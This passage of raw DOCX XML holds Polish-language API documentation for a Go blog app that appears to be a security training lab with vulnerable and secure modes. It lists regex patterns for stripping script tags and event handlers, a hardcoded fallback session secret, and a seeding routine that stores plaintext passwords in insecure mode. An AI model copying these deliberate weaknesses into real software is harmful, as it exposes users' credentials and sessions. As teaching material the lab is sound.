        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.4. fallbackAdminUsername</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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internal/db/db.go:15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"admin"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internal/db _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="22" w:name="sec22"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.5. seedEventAttributeRE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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internal/db/db.go:22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regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:t>(?i)\s+on[a-z0-9_-]+\s*=\s*("[^"]*"|'[^']*'|[^\s&gt;]+)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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internal/db _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="23" w:name="sec23"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.6. seedJavascriptSchemeRE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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internal/db/db.go:23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regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:t>(?i)javascript\s*:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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internal/db _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="24" w:name="sec24"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.7. seedScriptTagRE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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internal/db/db.go:21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regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:t>(?i)&lt;/?\s*script[^&gt;]*&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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internal/db _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="25" w:name="sec25"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.8. Funkcje i metody</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="26" w:name="sec26"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.9. seededAdminCredentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26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internal/db/db.go:26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seededAdminCredentials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email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16" w:name="lst16"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 16. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201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password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email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27" w:name="sec27"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.10. InitDB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27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internal/db/db.go:47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> InitDB opens (or creates) a SQLite database file at filepath and returns the *sql.DB handle.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InitDB opens (or creates) a SQLite database file at filepath and returns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the *sql.DB handle.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InitDB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filepath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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2017" w:name="lst17"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 17. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201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filepath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*sql.DB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28" w:name="sec28"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.11. MigrateDB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28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internal/db/db.go:59</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MigrateDB creates the blog, users, and comments tables if they do not already exist.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MigrateDB creates the blog, users, and comments tables if they do not already exist.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MigrateDB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18" w:name="lst18"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 18. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201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db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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29" w:name="sec29"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.12. columnExists</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29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internal/db/db.go:119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columnExists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table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column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19" w:name="lst19"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 19. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201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db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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table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column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30" w:name="sec30"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.13. SeedDB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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internal/db/db.go:149</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SeedDB inserts dummy data into blog and users tables when they are empty. In secure mode user passwords are stored as bcrypt hashes; in insecure mode they are stored in plaintext (so the Sensitive Data Exposure scenario can be demonstrated by inspecting the database directly).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SeedDB inserts dummy data into blog and users tables when they are empty.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In secure mode user passwords are stored as bcrypt hashes; in insecure mode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they are stored in plaintext (so the Sensitive Data Exposure scenario can be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demonstrated by inspecting the database directly).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SeedDB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20" w:name="lst20"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 20. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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securityEnabled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31" w:name="sec31"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.14. encodePasswordForSeed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31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internal/db/db.go:222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encodePasswordForSeed returns the plaintext password in insecure mode and a bcrypt hash in secure mode.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encodePasswordForSeed returns the plaintext password in insecure mode and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a bcrypt hash in secure mode.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encodePasswordForSeed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21" w:name="lst21"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 21. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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password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securityEnabled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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="32" w:name="sec32"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.15. upsertSeedUser</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32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internal/db/db.go:233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upsertSeedUser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email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role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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2022" w:name="lst22"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 22. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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password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email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role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securityEnabled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33" w:name="sec33"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.16. encodeCommentForSeed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33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internal/db/db.go:251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encodeCommentForSeed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023" w:name="lst23"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 23. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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body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securityEnabled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34" w:name="sec34"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. internal/handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="35" w:name="sec35"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.1. Typy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="36" w:name="sec36"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.2. Handler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r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internal/handlers/handlers.go:41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typ Handler przechowuje dane używane przez pakiet internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>svc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*service.Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="37" w:name="sec37"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.3. Stałe i zmienne</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="38" w:name="sec38"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.4. authCookieName</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38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internal/handlers/handlers.go:29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"bai_auth_user"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internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="39" w:name="sec39"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.5. csrfCookieName</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39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internal/handlers/handlers.go:30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"bai_csrf_token"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internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="40" w:name="sec40"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.6. fallbackSessionSecret</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40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internal/handlers/handlers.go:36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"bai-lab-demo-secret-do-not-use-in-prod"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fallbackSessionSecret is used only when BAI_SESSION_SECRET is unset. In a production system this must come from a securely stored secret.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="41" w:name="sec41"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.7. maxUploadBytes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41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internal/handlers/handlers.go:33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5 &lt;&lt; 20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internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="42" w:name="sec42"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.8. securePingTimeout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42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internal/handlers/handlers.go:38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3 * time.Second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internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="43" w:name="sec43"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.9. sessionSecretEnv</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43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internal/handlers/handlers.go:37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"BAI_SESSION_SECRET"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internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="44" w:name="sec44"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.10. uploadsDir</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44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internal/handlers/handlers.go:31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"./uploads"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internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="45" w:name="sec45"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.11. uploadsURLPath</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45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internal/handlers/handlers.go:32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"/uploads"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internal/handlers _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="46" w:name="sec46"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.12. validHostRE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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internal/handlers/handlers.go:1417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regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:t>^[a-zA-Z0-9.\-]+$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> validHostRE matches only safe hostname/IP characters; metacharacters are excluded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="47" w:name="sec47"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.13. Funkcje i metody</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="48" w:name="sec48"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.14. New</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48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internal/handlers/handlers.go:45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New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svc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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2024" w:name="lst24"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 24. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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svc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*service.Service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securityEnabled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*Handler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49" w:name="sec49"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.15. *Handler.securityEnabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49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internal/handlers/handlers.go:50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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2025" w:name="lst25"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 25. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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50" w:name="sec50"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.16. *Handler.SetSecurityEnabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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internal/handlers/handlers.go:54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SetSecurityEnabled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26" w:name="lst26"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 26. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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51" w:name="sec51"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.17. renderHTML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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internal/handlers/handlers.go:58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renderHTML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status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component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templ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Component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27" w:name="lst27"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 27. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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status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pageName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component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>templ.Component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52" w:name="sec52"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.18. signCookieValue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52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internal/handlers/handlers.go:70</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> signCookieValue creates a signed cookie value: "username|hmac(username)". Used in secure mode so the cookie value cannot be trivially forged.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signCookieValue creates a signed cookie value: "username|hmac(username)".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Used in secure mode so the cookie value cannot be trivially forged.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signCookieValue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028" w:name="lst28"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 28. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="53" w:name="sec53"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.19. sessionSecret</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53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internal/handlers/handlers.go:77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sessionSecret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029" w:name="lst29"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 29. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202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54" w:name="sec54"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.20. verifyCookieValue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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internal/handlers/handlers.go:85</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> verifyCookieValue checks the HMAC signature and returns the username.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verifyCookieValue checks the HMAC signature and returns the username.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verifyCookieValue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value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30" w:name="lst30"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 30. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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value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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="55" w:name="sec55"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.21. *Handler.setAuthCookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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internal/handlers/handlers.go:98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setAuthCookie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31" w:name="lst31"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 31. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context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częścią mechanizmu bezpieczeństwa albo scenariusza porównania vulnerable/secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="56" w:name="sec56"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.22. *Handler.currentUsername</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56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internal/handlers/handlers.go:109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currentUsername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32" w:name="lst32"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 32. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203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c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
